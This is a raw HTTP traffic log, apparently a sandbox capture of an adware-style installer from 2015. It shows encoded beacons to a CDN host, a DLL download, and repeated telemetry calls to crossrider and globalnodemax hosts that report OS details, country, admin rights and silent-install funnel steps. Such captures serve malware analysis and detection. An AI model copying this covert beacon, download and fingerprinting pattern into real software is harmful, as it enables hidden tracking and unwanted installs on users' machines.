GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1hQ8FnfYbyw8RQC drCF7eFrF/wZm0XNBk92S527KGfc1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gOTLcOqfVOXSmF904v4t2DcTuPEvZOc8eNpxrUgcko41 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1iSr4DTw5uXZI4G r 3F6T7Ye9UEEkdnkZTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YP62O0yjhYNJo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNTTdRaBizOJsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoTp7ys67qImnFAL52sIXt4XOSMm4SbI/lC36 lBzVeTnLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1jk8Kba5gyWOQTxIUcsgQ wHN378SfA9Jw2vwNjRSVjtK08O3cXugjd nyapwjUqvQzsAhT5Gds122TndWfocfATyDhi3Wnjo0frAy8J59dd9rgBtSK5GMJ2nwKHV4nKhQuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovu3bfNrUBKNV HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=2UW/O98m6H IItTUp4SEbaiMvWwsgkIRKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kR01FXcnLDv1034RmeWOWUy4btG OZIk/mETyJyixTFVdn5IXPnT9 7PiCC4paVhdJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpViqw Gsnisvn8SJA d bWCFI/522fKenZo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=KC46TpkJIZx8NmhuTfZHgDyMpz1LiwuqKEhxUiTGHeVXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySrXIxNf6X/p9WOvghCBTr/TdVMo67fxO0s IILilpWF27wThqOSPC/DYd0CRAC1t0wBJ8Bzh64YUklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=aUlNCxxkjnRnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilHJn1GegIILyOsrHZsRsIfMRhg0WUsz0XmIajF ylV 6H8YWruN4e6MTuXTWi43QJYJW50WOaC75x7mM32iDekcU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=W5y9y1UrGBlnA3VLGqrT9aPuao ctN6paMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3eqfOL09Waq7Xt7qcDfFhJwTxIUcsgQ wWDLNdKr8lliPhNVb7n8lt8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=aonlVHCKlbW/q1OYm6RuNmByKcxzlv585b37y9B2vIWAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJJl8f63dS692dskpjA9 6EJZxK5xGkdrnFAL52sIXt4VzrzFC04 gVxTj1NCBqzFNNh3QJEALW3S3BlOQDiqUVkeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=xY8ohDYpM gLjT49fHfOTNcxGaPWyPpOjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPo dgTcNa6NZpFhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YPTQLrSsAb MLus5Wbw9bkMfiZm 4OAHnaoKai08bVxwYEQnuvuDBXEJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=uWabAt9SLcwnl2fxC/WcuzyMpz1Liwuq 16VblNcBpdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySaJkIKvOmtNBWOvghCBTr/TdVMo67fxO0s IILilpWF0vmoXMQKU1KjfsnOwcx38cDPVxwNO6aHCv3we1qTpKH8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=AZwPyJy3TZi4/9HrRpQ3bFoXilXt x7l68pZe0fGxSA2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmPxZZ7PW1hqwWMnNHFDGURnWsPQyEGmp3E4AKI//EGlK8qJaeUqNPyfIROPie2z407nXsJR6HRCLBPEhRyyBD7Dl617yh4HAWXhuXtiRNzc6pgJ7bW38x7N6a7p3zoCTj900rk/u2q4sYtQkadOxeGUQrm7qkQJ07VLGI2tGMAZkEHlpLL4kVIVZsO2IRUm0S3fTzht6ovY1YV lHKmkCemqn1dzsO21qFO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /27944.ashx?e=PcwT4QFtuPCnIVMsUgdaKeTSsuAiFgZ3EhGH33nPGlFA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZT4qEGVFBmbCNaC2D7gVLsXVWyif 2VH4gkOB3v7aTq0HF6v/LiU/bpEYybADOKl3RvzErPfRBsvzE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyG1ilf4LTBlruf1mkJJrsh5qUaB4LB4DB HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:09 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Thu, 23 Jul 2015 01:21:44 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
Accept-Ranges: bytes
Server: AmazonS3
Age: 77888
X-Cache: Hit from cloudfront
Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: iF_sYd9owr1lOc005qBVQxmuwxBwbDH4Xo3jecnUkQJoKpFmbFtMtQ==
<<< skipped >>>
GET /utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=4703&rnd=8361 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:43 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vxOuXi588w/AzOHtdmuw15FhLDDx49YvMRFwaOXh44WIS/UP14H5vFXDcvW3xWKv
x-amz-request-id: 2FE2AE870D8CA48D
Date: Sat, 01 Aug 2015 04:17:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: rgqK9EhjO BCJIP4qw gE9/IrWb3 FMbUZphs PlVRX0nKGBDxCHpWt8yEQNS7H7
x-amz-request-id: 1189B44B7C5A10F8
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Hc6oQempavZmJ8nFd7psNibH8XXzQcicyRrK0X75dfXSEKW1SAOgjBmkPMaIhASO
x-amz-request-id: D8D4072E35B535DE
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 5fCdSekPahJuBjAPN3Da2ksQU1Za4Sezb94MIp68AGLpMRrH 9/762iREQcXlZaX
x-amz-request-id: CB9D566916DDA97C
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 4i8dT3SGT21ntb7xLqNbg5l1X6gb/TXDolETz5cvLSeEib4/3vdP9yNmIeBFKD7E
x-amz-request-id: DBCCCE9DC419839E
Date: Sat, 01 Aug 2015 04:17:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: WwXacb9md/kB6WaXgoOyKYj1kamOQiXxk5K1frWh7UGL/eh gLZuIKCe agg1Zbf
x-amz-request-id: 97609731C06D0957
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: d8fcP6nco8ebNOe1qsUJ206lLQaF2akZJ04ezX79UaW2O3vgUNQLPY8rfoHy1FLN
x-amz-request-id: 562E01D3F1C28428
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Iq7/z4rY1F27lOsQVcogGLy15LU0hL1vX5VxKMzgq5bOmiUj/KrewZFIG2DKGl4J
x-amz-request-id: 60E6A87DB2946CF5
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: BLCY5xEgn3920M6ufpm4fGNUvc6clLUs75wE6mxGc/f/agzf/ESfd3hDlDaH/uoQ
x-amz-request-id: 2FA5EE880001314D
Date: Sat, 01 Aug 2015 04:17:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Nz1x3onDjSsEyaAw0s dRHuI77OeLIxNuPuqCehKjJW2mS49QHs9ng5QZLDm1Ad
x-amz-request-id: D918790A71DEDA6D
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: qXoKBSsetrOdyEQLaIR9w8XGjQTvBd0oZj7meqVsn3y5LvxH NPUxZi qGvt7aWJ
x-amz-request-id: 6FBC13B7AED16120
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: GPgO7dA7a jcmWyE8cryBlZqeYp2yfyxdXsxUcAA0/Ey1vrCKLeuuorEe/SZg0sI
x-amz-request-id: 585DB20DACD7AFDC
Date: Sat, 01 Aug 2015 04:17:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GET /utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 HTTP/1.1
Host: errors.globalnodemax.com
Connection: Keep-Alive
